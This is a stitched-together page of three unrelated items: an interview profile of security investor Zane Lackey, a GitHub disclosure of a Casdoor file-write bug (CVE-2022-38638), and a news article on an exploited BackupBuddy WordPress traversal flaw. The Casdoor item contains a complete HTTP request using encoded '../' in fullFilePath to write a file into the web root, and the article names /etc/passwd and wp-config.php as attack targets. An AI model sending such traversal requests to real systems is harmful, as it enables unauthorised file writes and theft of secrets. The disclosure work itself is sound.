"Security was one of the largest speed bumps to early DevOps adoption," Lackey says. As CISO at Etsy, an early DevOps adopter, he learned how to institute DevOps through firsthand experience. He co-authored a book on the topic, called _Building a Modern Security Program_, and found he enjoyed sharing the lessons he learned with other enterprises going through the shift.

Angel investing seems to unite Lackey's two professional passions: the steady march of DevOps as a discipline and the love of frustrating, high-stakes, high-risk play. It's also a union of right-brain tech and left-brain leadership skills, which seems to come naturally to Lackey. Last year he explained to Cloud Security podcast that as all roles merge, founders have to keep their goals in mind or risk failing. "You're building a company," he told them, "not a tech project" — remarkable advice from an infrastructure specialist.

Fastly bought Signal Sciences in 2020. Lackey consulted independently for two years before accepting the partner role at a16z. He likes the work, particularly his interactions with founders — "I enjoy being their first call," he says — and says the new solutions he's seeing are extraordinary. He won't say what those solutions are, for confidentiality's sake; presumably they include updated zero-trust protocols for the 2020s. But he's happy to see the discipline he helped shape, DevOps, take on a life of its own. 

"This is a generational change in software development and delivery," he says. "I'm excited for the future."

**PERSONALITY BYTES**

**What professional achievement are you most proud of?** "It's not an achievement, but I'm very proud of all the teams I've been able to be a part of, and the work we've done."

**What one technology or solution has made the greatest impact on your work?** "Again, it's not a technology, but I'd say velocity — the increase in velocity. The shift from the waterfall-approach era to the DevOps era has been about rapid movement, rapid iteration. I mean, think of how long it took to found a company in the '90s, compared to the early 2000s, compared to now."

**What's one thing your colleagues would never guess about you?** "I was born in a fishing village in Alaska. Talk about low tech! My parents went to Alaska in the '70s to work as commercial fishermen. After they had me, they moved to Murphys."

**Any hobbies?** "Travel — I've been to every continent except Antarctica, but that's next. I ski and snowboard."

**Finally, we understand you're a scotch drinker. Islay, Speyside, Highland?** "I love all whiskeys: bourbon, scotch, Japanese. I tend to like peatier scotches, though — your basic Lagavulin 16, for example. One glass is usually enough."

Zane Lackey: 'Technology Is the Easy Bit'

Casdoor v1.97.3 was discovered to contain an arbitrary file write vulnerability via the fullFilePath parameter at /api/upload-resource.

Hi, I found a security issue, when the upload provider is Storage Local File System, the fullFilePath parameter of the interface /api/upload-resource will have a directory spanning problem, the user can specify a relative path to write malicious files to the file system, or even overwrite the files, my request message is shown below：

POST /api/upload-resource?owner=built-in&user=admin&application=app-built-in&tag=custom&parent=provider\_storage\_local\_file\_system&fullFilePath=resource%2F%2e%2e%2F%2e%2e%2Fweb%2Fbuild%2Fflag.html&provider=provider\_storage\_local\_file\_system HTTP/1.1
Host: door.casdoor.com
Cookie: casdoor\_session\_id=2fd9ab275d8d65ea296ab327fd92166a
Content-Length: 192
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="103", "Chromium";v="103"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUPAwhIoXMrbemuJM
Accept: \*/\*
Origin: https://door.casdoor.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://door.casdoor.com/resources
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

\------WebKitFormBoundaryUPAwhIoXMrbemuJM
Content-Disposition: form-data; name="file"; filename="spider.png"
Content-Type: image/png

I'm here.
\------WebKitFormBoundaryUPAwhIoXMrbemuJM--

Then we can find out that the problem does occur by following this link。  
https://door.casdoor.com/flag.html

CVE-2022-38638: Arbitrary file write/overwrite Vulnerability · Issue #1035 · casdoor/casdoor

The critical flaw in BackupBuddy is one of thousands of security issues reported in recent years in products that WordPress sites use to extend functionality.

Attackers are actively exploiting a critical vulnerability in BackupBuddy, a WordPress plug-in that an estimated 140,000 websites are using to back up their installations.

The vulnerability allows attackers to read and download arbitrary files from affected websites, including those containing configuration information and sensitive data such as passwords that can be used for further compromise.

WordPress security vendor Wordfence reported observing attacks targeting the flaw beginning Aug. 26, and said it has blocked close to 5 million attacks since then. The plug-in's developer, iThemes, issued a patch for the flaw on Sept. 2, more than one week after the attacks began. That raises the possibility that at least some WordPress sites using the software were compromised before a fix became available for the vulnerability.

**A Directory Traversal Bug**

In a statement on its website, iThemes described the directory traversal vulnerability as impacting websites running BackupBuddy versions 8.5.8.0 through 8.7.4.1. It urged users of the plug-in to immediately update to BackupBuddy version 8.75, even if they are not currently using a vulnerable version of the plug-in.

"This vulnerability could allow an attacker to view the contents of any file on your server that can be read by your WordPress installation," the plug-in maker warned.

iThemes' alerts provided guidance on how site operators can determine if their website has been compromised and steps they can take to restore security. These measures included resetting the database password, changing their WordPress salts, and rotating API keys and other secrets in their site-configuration file.

Wordfence said it had seen attackers using the flaw to try to retrieve "sensitive files such as the /wp-config.php and /etc/passwd file which can be used to further compromise a victim."

**WordPress Plug-in Security: An Endemic Problem**

The BackupBuddy flaw is just one of thousands of flaws that have been disclosed in WordPress environments — almost all of them involving plug-ins — in recent years.

In a report earlier this year, iThemes said it identified a total of 1,628 disclosed WordPress vulnerabilities in 2021 -- and more than 97% of them impacted plug-ins. Nearly half (47.1%) were rated as being of high to critical severity. And troublingly, 23.2% of vulnerable plug-in had no known fix.

A quick scan of the National Vulnerability Database (NVD) by Dark Reading showed that several dozen vulnerabilities impacting WordPress sites have been disclosed so far in the first week of September alone.

Vulnerable plug-ins are not the only concern for WordPress sites; malicious plug-ins are another issue. A large-scale study of over 400,000 websites that researchers at the Georgia Institute of Technology conducted uncovered a staggering 47,337 malicious plug-ins installed on 24,931 websites, most of them still active.

Sounil Yu, CISO at JupiterOne, says the risks inherent in WordPress environments are like those present in any environment that leverages plug-ins, integrations, and third-party applications to extend functionality.

"As with smartphones, such third-party components extend the capabilities of the core product, but they are also problematic for security teams because they significantly increase the attack surface of the core product," he explains, adding that vetting these products is also challenging because of their sheer number and lack of clear provenance.

"Security teams have rudimentary approaches, most often giving a cursory look at what I call the three Ps: popularity, purpose, and permissions," Yu notes. "Similar to app stores managed by Apple and Google, more vetting needs to be done by the marketplaces to ensure that malicious \[plug-ins, integrations, and third-party apps\] do not create problems for their customers," he notes.

Another problem is that while WordPress is widely used, it often is managed by marketing or Web-design professionals and not IT or security professionals, says Bud Broomhead, CEO at Viakoo.

"Installing is easy and removing is an afterthought or never done," Broomhead tells Dark Reading. "Just like the attack surface has shifted to IoT/OT/ICS, threat actors aim for systems not managed by IT, especially ones that are widely used like WordPress."

Broomhead adds, "Even with WordPress issuing alerts about plug-ins being vulnerabilities, other priorities than security may delay the removal of malicious plug-ins."

Tag

#google